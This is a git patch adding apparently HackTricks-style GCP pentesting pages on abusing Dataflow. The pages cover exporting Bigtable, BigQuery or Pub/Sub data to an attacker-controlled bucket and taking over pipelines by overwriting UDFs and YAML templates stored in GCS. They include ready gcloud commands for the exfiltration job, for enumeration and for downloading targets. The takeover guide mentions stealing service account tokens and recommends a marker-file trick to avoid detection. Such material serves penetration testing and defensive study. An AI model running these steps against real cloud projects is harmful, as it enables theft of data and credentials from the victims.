From 2100c6d41cd170704bfaa6e112ee95915967f055 Mon Sep 17 00:00:00 2001
From: Translator
Date: Mon, 16 Feb 2026 11:11:48 +0000
Subject: [PATCH] Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/
---
 .../gcp-dataflow-post-exploitation.md |  53 ++++++
 .../gcp-dataflow-privesc.md           | 172 ++++++++++++++++++
 .../gcp-services/gcp-dataflow-enum.md |  81 +++++++++
 3 files changed, 306 insertions(+)
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md

diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
new file mode 100644
index 000000000..375572f8d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -0,0 +1,53 @@
# GCP - Dataflow Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

For more information about Dataflow check:

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### Abuse Dataflow to exfiltrate data from other services

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (on an SA with access to both the source and the sink)

With permission to create Dataflow jobs, you can use Google-provided Dataflow templates to export data from services such as Bigtable, BigQuery or Pub/Sub into an attacker-controlled GCS bucket. This is a powerful post-exploitation technique whenever you obtain Dataflow access, for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover through bucket writes).

> [!NOTE]
> You need `iam.serviceAccounts.actAs` on a service account (SA) with enough permissions to read the source and write to the sink. By default, if none is specified, the Compute Engine default SA is used.

#### Bigtable to GCS

See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" — for the full pattern.
Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
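The public template location passed to `--gcs-location` is built from the region, a template version and the template name. A quick way to sanity-check the path before launching anything (a sketch; every variable value below is an illustrative placeholder, not taken from any real target):

```shell
# Build the --gcs-location value from its parts and print the final command
# instead of running it (dry run). All values are placeholders.
REGION="us-central1"
TEMPLATE_VERSION="latest"
TEMPLATE="Cloud_Bigtable_to_GCS_Json"
GCS_LOCATION="gs://dataflow-templates-${REGION}/${TEMPLATE_VERSION}/${TEMPLATE}"

# Print the command for review; drop the leading `echo` to actually launch it
echo gcloud dataflow jobs run exfil-job \
  --gcs-location="${GCS_LOCATION}" \
  --region="${REGION}"
```

Drop the leading `echo` once the path and parameters look right for the target.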
Export Bigtable to an attacker-controlled bucket:

```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<region>/<template-version>/Cloud_Bigtable_to_GCS_Json \
--project=<project> \
--region=<region> \
--parameters=bigtableProjectId=<victim-project>,bigtableInstanceId=<instance>,bigtableTableId=<table>,filenamePrefix=<prefix>,outputDirectory=gs://<attacker-bucket>/raw-json/ \
--staging-location=gs://<attacker-bucket>/staging/
```
#### BigQuery to GCS

Dataflow templates also exist to export BigQuery data. Use the template that matches the target format (JSON, Avro, etc.) and point the output at your bucket.

#### Pub/Sub and streaming sources

Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to a bucket you control.

## References

- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)

{{#include ../../../banners/hacktricks-training.md}}

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
new file mode 100644
index 000000000..2ed42acad
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -0,0 +1,172 @@
# GCP - Dataflow Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not verify the integrity of the UDFs and job template YAML files stored in GCS. With write access to the bucket you can overwrite these files to inject code that executes on the workers, steal service account tokens, or alter the data processing flow. Both batch and streaming pipeline jobs are viable targets. To pull this off against a pipeline, you must replace the UDFs/templates before the job runs, in the first minutes after a run starts (before the job's workers are created), or while the job is running, before autoscaling spins up new workers.

**Attack vectors:**

- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets

> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would execute thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: at startup, check whether a marker file (e.g. `/tmp/pwnd.txt`) exists; if it does, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker** instead of once per row.

#### Direct exploitation via gcloud CLI

1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
List jobs and describe them to get the template path, staging location, and UDF references:

```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<project>

# Describe a job to get the template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <job-id> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```
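The `--full` output can be long; a simple grep over the dump pulls out every GCS path the job references. The sketch below runs against a fabricated sample description (the bucket name, paths and the `job.yaml` filename are ours); against a real target, redirect the `gcloud dataflow jobs describe` output into the file instead:

```shell
# Fabricated sample of a job description; in practice produce it with:
#   gcloud dataflow jobs describe <job-id> --region=<region> --full --format=yaml > job.yaml
cat > job.yaml <<'EOF'
environment:
  sdkPipelineOptions:
    options:
      stagingLocation: gs://victim-bucket/staging
      templateLocation: gs://victim-bucket/templates/job.json
      javascriptTextTransformGcsPath: gs://victim-bucket/udfs/transform.js
EOF

# Extract every unique GCS path referenced by the job
grep -oE 'gs://[A-Za-z0-9_./-]+' job.yaml | sort -u
```

Any of these paths that lives in a bucket you can write to (UDFs, templates) is a takeover candidate.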
2. Download the original UDF or job template from GCS:
Download the UDF file or YAML template from the bucket:

```bash
# If the job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<bucket>/<path>/<udf>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<bucket>/<path>/<template>.yaml ./template_original.yaml
```